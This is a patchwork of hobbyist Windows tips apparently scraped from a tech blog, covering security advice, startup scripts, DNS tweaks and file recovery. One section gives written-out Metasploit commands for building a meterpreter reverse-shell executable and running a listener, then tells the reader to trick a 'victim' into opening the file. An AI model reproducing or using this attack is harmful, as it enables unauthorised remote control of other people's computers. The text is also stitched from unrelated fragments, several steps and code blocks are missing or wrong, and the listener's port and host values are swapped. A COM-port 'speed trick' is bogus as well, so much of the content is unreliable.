When hackers are all around and most of use Windows, it is very important for us to maintain security. If you have read my tutorial on How to Hack Windows using Kali/Backtrack , you will realize how easy it is for hackers to hack into your PC and do almost anything sitting in any remote part of the globe. Keeping Security in Mind, I have listed some of the steps below which will help you to give a strong competition to Cyber Criminals.

1. Use Genuine Windows product

I know it might sound odd if you are a shellfish person like me in terms of money. Spending around $100 for a software which is already available for free download on the internet might give you pain in the ass. But Genuine is Genuine, pirated copies cannot compete with those. Genuine's are more faster and secured

2. Update Windows Regularly

Now, if you have spent some bucks on purchasing the genuine copy, keep it Updated with time. Every time a new Update comes it fixes few bugs and security loopholes. Keeping your Windows Updated keeps hackers away from exploiting old vulnerabilities on your Machine.

3. Keep other Software's Up-to-Date

What if you have bought genuine windows and Update it regularly, hackers might use the loopholes on other software. Ex. If you have a old version of Chrome Browser which is venerable to a attack, then hacker might exploit the venerability even you have a Updated OS. Hence, keep your every software Up-To-Date.   

4. Use a Anti-Virus Software

There are many companies who have good anti-virus software's at cheap plans. Anti-Viruses are very essential to protect yourself from viruses which can Corrupt files, take up space or even bring your system down. 

5. Use Anti-malware

Using Anti-Virus software will save you from viruses but there are also other many devils like worms, trojans, spywares and many more craps which will blow up your system, so it's better to use Anti-Malware

5.Use Software Firewalls

There are many free firewalls available in the market which may block incoming traffic and other auspicious activities i.e. prevent the Cyber Criminals from accessing your system with out your permission .

6. Use a Tuff Windows Password 

What if the covict is not a cuber criminal sitting on the other part of the globe but your friend who shares your room and has Physical access to your System. So, it's better to use a Strong Administrator Password. Even use SYSKEY  , which is a extra layer of protection  to your password which can be enabled by Pressing Windows key + R and then type syskey

7. Use windows using other user account

Stop!! using windows using Administrator account, create a different user account and use that because if you accidentally open any malicious program with Administrator privileges, than it may cause a serve damage to your system .

8. Be alert while browsing online

Always Prevention is Better than cure, be alert while browsing the internet. Do not visit the site's you do not know and do not download any file from Email attachment or website until and unless you are 100% sure about it's legitimacy

1. Go to Notepad

2. Type the following code

Set speech=Create Object("sapi.spvoice")

3. Replace USERNAME with your name

4. Save the file as welcome.vbs

5. Now copy the file and Paste it at C:\Documents and Settings\All Users\Start Menu\Programs\Startup .

STEPS:

1. Now when you have downloaded the ROX Player. Also download a torrent file of your desired movie/content. Now, I assume that you at least know how to download a torrent file.

2. Now, install the ROX Player and open it. It brings you a interface as shown in the picture.

3. Now Click on File at the top-left corner of the corner window. Hover the cursor over Open .torrent and then Click on .torrent file

4. This brings you a window as shown in the picture below. Click on the torrent file which we downloaded before and Click Open.

5. You are simply done. The Video/Movie starts buffering as shown in the picture below. The time of buffering depends upon your connection speed

I know it's a silly simple tutorial, but its very important in the work of a Blogger and Vlogger. This tutorial doesn't require any special software but MS Paint which is pre-installed with with windows

STEPS: 

1. Hit the Print Src key on the Keyboard

2. Go to MS Paint

Steps:

1. Go to php-proxy.com and download the zip file.

2. Go to the templates folder and open the index.php file with notepad/notepad++

3. Change the title of the page by editing the <title>PHP-Proxy</title> to a desirable title

4.Go to this line:  <h1 style="color:blue;">PHP-Proxy</h1> . Edit the name from PHP-proxy to desirable name.

5. Upload all files and folders in the same order to a  hosting account: either free or paid
         i) 2freehosting
        ii) 1freehoating
       iii) Hostinger etc

Here's a great tip on how to recover those files and folders that became a shortcut on your USB drive

STEPS:

1. Insert you USB Drive

2. Note down the Letter of the drive. For eg. ( If your USB drive name shows the name - "Removable Disk:F", then F is your drives letter.)

3. Press ( CTRL + R )

4. Type : cmd

5. This will open a command prompt, now type the following code:

attrib(space)-r(space)-a(space)-s(space)-h(space)/s(space)/d(space)DriveLetter:\*.*

For eg :

attrib -r -a -s -h /s /d f:\*.*

That's it. You will get your files back.

Below is a step by step tutorial on how to hack a windows PC using Kali/ Backtrack.

Requirments:
1. Kali / Backtrack OS- Can be Downloaded from >>>>here<<<<
2. A PC
3. Internet

Procedure:
I would recommend you to burn the ISO on a USB or DVD and run it through them because using it in VMWare or Virtual Box will work only if the target in in the same LAN/Network. And also prefer to use the internet directly through modem (not router) because if you want to do it through your router, then you will also have to perform port forwarding in your router.

1. Run Kali/ Backtrack
2. Open the browser and go to whatismyipaddress.com . Note down the IP.
3. Open terminal and type:

     msfpayload windows/meterpreter/reverse_tcp LHOST=your IP LPORT=4444 x > /root/Desktop/example.exe

Note: Replace "your IP" in the above code with your IP address which we found out before.

4. Now you will get a file called example.exe on the desktop.
5. Now, close that terminal and open a new one and type the following code one by one:


msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT your IP
set LHOST 4444
exploit

Note: Replace your IP with your IP address we found before


6. After executing all of the above codes, give the file example.exe to your victim and convince him to somehow open your file.
7. As soon as he opens the file you will se some text running on your terminal and then you have access to his computer.

Now you can download the text file from >>> here <<< and use the following commands to control his PC.

Here's a simple tutorial on how could you simply hide all your files behind  folder and then pssword protect it and then even hide it. All this without any software....So lets begin......

1. Copy the following code and paste it in a notepad file and save the file as "hackerslite.bat"

2. Now double click the file and you will get a folder called "locker" on the same place. Put all your files there.

3. Now again click the file "hackerslite.bat" and then input a password you want and then press enter.

You will see that your folder has been hidden. To get the folder back, open the file "hackerslite.bat" and input your password.

Here is one more working tutorial which is tried and tested by us on how to increase the internet speed on pc using a DNS server.....

1. Open your local area connection properties, which can simply opened by double clicking the "Local Area connection" icon in the taskbar on XP.

2. Click on properties.

3. Click on Internet Protocol or Internet Protocol IPv4 (TCP/IP) server.

4. Click on use the following DNS server option and input the following:


            Preferred DNS server   :  208.67.222.222
           Alternate DNS server   :  208.67.220.220

Note: If you already have the above settings and you are experiencing slower Internet, then use the following configuration:

           Preferred DNS  server  :  8.8.8.8
          Alternate DNS server    :  8.8.4.4

5. Click on OK and again OK

You are simply done. You may experience a faster internet.

Seriously guys this trick of speeding internet is really working:


1. Right Click on "My computer" and click on "Properties".

2. Click on "Hardware" tab and then select "Device Manager".

3. Now click the "+" sign before "ports" and then double click "Communication Ports".

4. Now to to "port settings" tab

   Change the value of "bits control per second" to 128000
   Change the value of "flow" tab to hardware

5. Click OK.
